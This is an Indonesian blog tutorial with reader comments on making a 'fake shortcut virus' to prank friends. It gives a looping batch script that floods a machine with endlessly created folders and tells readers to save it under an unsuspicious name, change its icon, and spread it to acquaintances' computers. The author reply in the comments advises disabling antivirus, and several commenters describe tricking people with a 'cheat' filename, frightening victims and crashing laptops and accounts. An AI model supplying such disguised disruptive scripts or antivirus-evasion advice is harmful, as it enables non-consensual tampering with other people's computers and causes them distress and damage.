Satu Juta Virus Shorcut – Ayo Jahili Teman Anda Sekarang Juga

Saya yakin anda pasti sudah pernah melihat atau bahkan terkena infeksi dari Virus Shorcut, yaitu sebuah virus yang menyebarkan dan menggandakan dirinya dengan cara menyamar sebagai shorcut program ataupun file yang ada di komputer anda. Nah, kali ini kami akan membagikan Trik bagaimana cara membuat semacam Virus Shortcut yang jumlahnya jauh lebih banyak dibandingkan dengan virus shortcut aslinya. Kami akan mengajari anda cara membuat Virus Shorcut yang berjumlah 10000 biji….Haaa 10000 biji ???

Ya Benar, dengan adanya Virus Shorcut Palsu yang berjumlah 10000, maka sudah pasti korban akan langsung panik bahkan menjerit histeris karena ketakutan. Perlu anda ketahui, bahwa virus ini hanyalah virus palsu yang tidak membahayakan tetapi hanya bertujuan menjahili teman anda dan virus ini tidak memakan memory tapi hanya memakan tempat saja wkwkwkwkwk jadi tenang saja kawan ....^_^

Lalu, bagaimana cara membuatnya??? Udah nggak sabar yah…langsung saja perhatikan langkah-langkah dibawah ini :

1. Bukalah Notepad kemudian anda ketik atau copy script dibawah ini !

@echo off
:top

md %random%

goto top


2. Kemudian simpan dengan nama yang tidak mencurigakan…namanya terserah anda yang penting kasih ekstensi (.bat). Misalnya ‘Virus Palsu.bat’

3. Setelah itu ganti icon yang tidak mencurigakan juga.

4. Langkah terakhir, silahkan anda sebarkan virus tersebut ke komputer teman, saudara, adik, pak guru, pak satpam, pak kebun, bu siti, bu nunik, bu indah, dan semua yang anda kenal hahahahaha

5. Adapun cara menjalankannya adalah tinggal klik dua kali saja file virus palsu tadi maka otomatis 1000 shorcut akan langsung dibuat. Tunggulah prosesnya dan jika sudah Puas dan sudah merasa banyak sekali, silahkan klik tombol X pada aplikasi yang berjalan tersebut.


6. Dan berikut inilah hasilnya Screenshot dari 10000 virus palsu tersebut ^_^



Bagaimana tidak bingung sang korban nantinya, Lhaa…terkena virus shortcut sebanyak 5 saja sudah bingung untuk menghilangkannya apalagi ini 1000 hehehe

Pasti anda bertanya, Lalu bagaimana cara menghilangkan Shorcut yang berjumlah 1000 tadi??? Ehhhmmm…Mudah kok, anda cukup tekan CTRL + A lalu tekan Shift + Del untuk menghapusnya. Beress kan!!!

Tunggu apa lagi….langsung praktekk sekarang juga Gan ^_^


Penulis : Hilmi Masruri


39 komentar:

  1. mantap.. mas,..
    ntar saya coba pasang di sekolah ku..
    ahahaha...
    bakalan panik satu sekolah..
    :D

    BalasHapus
  2. wkwkwkwkw selamat mencoba mas....

    BalasHapus
  3. Bukan cuma 10 ribu folder yang dibikin, tapi bisa puluhan bahkan ratusan ribu kalau gak distop program bat nya

    BalasHapus
  4. Semoga java creativity tak ada hentinya memberikan tutorila kpada pengunjung!
    Mantap...

    BalasHapus
  5. Mantab Gan , Update terus ya bang Java Creativity :D

    BalasHapus
  6. Makasih atas kunjungan dan support dari teman-teman semua ^_^ sukses juga buat kalian

    BalasHapus
  7. cara njadi'in ekstensi batnya gimana?saya kurang faham mohon di ajari

    BalasHapus
  8. Untuk anonim diatas gue ( bang JC saya jawab ya nieh )
    1. Buka Notepad
    2. COpas Script-nya
    3. klik tab file terus save as
    4. disitu ada Save as terus nanti kita disuruh buat namanya misalnya folder.bat tapi buka .txt loh diganti ingat !
    5. taraa jadi. hasilnya temengue diletakkan di desktop dan document, jadi kakaruan, penuh sesak.

    oh ya gan ini saya manfaatkan untuk buat folder tersembunyi. jadi saya buat ratusan ribu folder, terus di buat seperti sama 5X dan buat folder pertama,k2,k3,dan filenya. filenya saya lock pakai and.... lock ( ada di artikel agan JC ), K3 ssama, folder ke 2 pakai mylockbox, folderke1 di hide pake freehide. kombinasi sembunyi ditambah password dan benteng folder hahaha

    BalasHapus
  9. gan smua software nya mntap
    update trus yach

    BalasHapus
  10. Sip bro .. [walau ga berani coba di PC sendiri; hehee] Langsung praktek aja besok.. thamk-you.

    BalasHapus
  11. sipp gan. .sumpah gokil..

    BalasHapus
  12. thx ghan...
    sedot.......
    download lagu :
    www.yrnjmusik.blogspot.com

    BalasHapus
  13. hi gan.... that's nice info, thx for sharing ^^
    visit & comment di entri terbaru saya ya .
    mksih sblumnya :)

    BalasHapus
  14. tak coba di komputerku, mantap..... UAKEH FOLDERE

    BalasHapus
  15. Gan Kalu Formatnya Vbscript Bisa Enggak

    BalasHapus
  16. Gan ... Ane Numpang Copas y.. {Tenang w Plus2 in dengan Sumbernya ..,,, + w tambahin k Link Teman ....

    Mampir y k www.habibnoerq.com

    www.habibnoerq.com
    Www.habibnoerq.com
    www.habibnoerq.com
    Www.habibnoerq.com
    www.habibnoerq.com
    Www.habibnoerq.com
    www.habibnoerq.com
    Www.habibnoerq.com
    www.habibnoerq.com
    Www.habibnoerq.com

    BalasHapus
  17. wahahahaha... tukang reparasinya benran panik ini. Malahan gak berani 'nyentuh' lap top ane, takut virusnya menyebar lewat udara kaleee???

    BalasHapus
  18. sayang sekali tampilannya tetap folder saya kira lngsung soutcut tapi NICE SHARE JC

    BalasHapus
  19. waah kebangetan nih,akun ane rusak 100%,jadinya ane ganti akun ane dehh,tapi gapapa keren gan.

    BalasHapus
  20. wkwkw ane coba di lektopq wah ngebleng lola banget ngaloding gmn ni gak bisa di tekan CTRL + A lalu tekan Shift + Del hahahah bantu ane gan

    BalasHapus
  21. ijin copas gan :)

    mampir ke blo sederhana saya ya http://pengetahuancomp.blogspot.com/ hehehe

    BalasHapus
  22. mantap gan...ane buat nama file nya cheat pes 2013...banyak yang kena....hahahha...
    iseng.com

    BalasHapus
  23. gan. ama antvrus kq dkirain vrus sih. ap prlu disable antivir ny?

    BalasHapus
  24. Betulll gan...sebaiknya Disable dulu antivirnya ^_^

    BalasHapus
  25. Wwkwkwkwk ..... keren'' gan .. udh aku coba di Laptop tmen ku ,
    Dia langsung panik ktakutan bhkan hampir nangis ,

    BalasHapus
  26. wahhh mantap gan
    temen q ampe nangis2 hahahahaha
    di tunggu yach postingan yang keren

    BalasHapus
  27. Itu Palsu kan mass, kagak beneran kan ?
    kalo palsu gue coba....!

    BalasHapus
  28. Java Creativity memang mantap !!!
    Aku baru beli buku teknik hacking semuanya mantap.....
    Java Creativity lanjut terus.....

    BalasHapus
  29. mantuap bwnget gan,,aku mw taruh tu virus ke lptop tmn'q biar dia darah tinggi,,hahahaha

    BalasHapus
  30. super sekali gan....!

    BalasHapus
  31. Gan. Caranya ini biar d share lewat wifi gmna ?

    BalasHapus
  32. Notepad itu cara dimana cari nya mas admin

    BalasHapus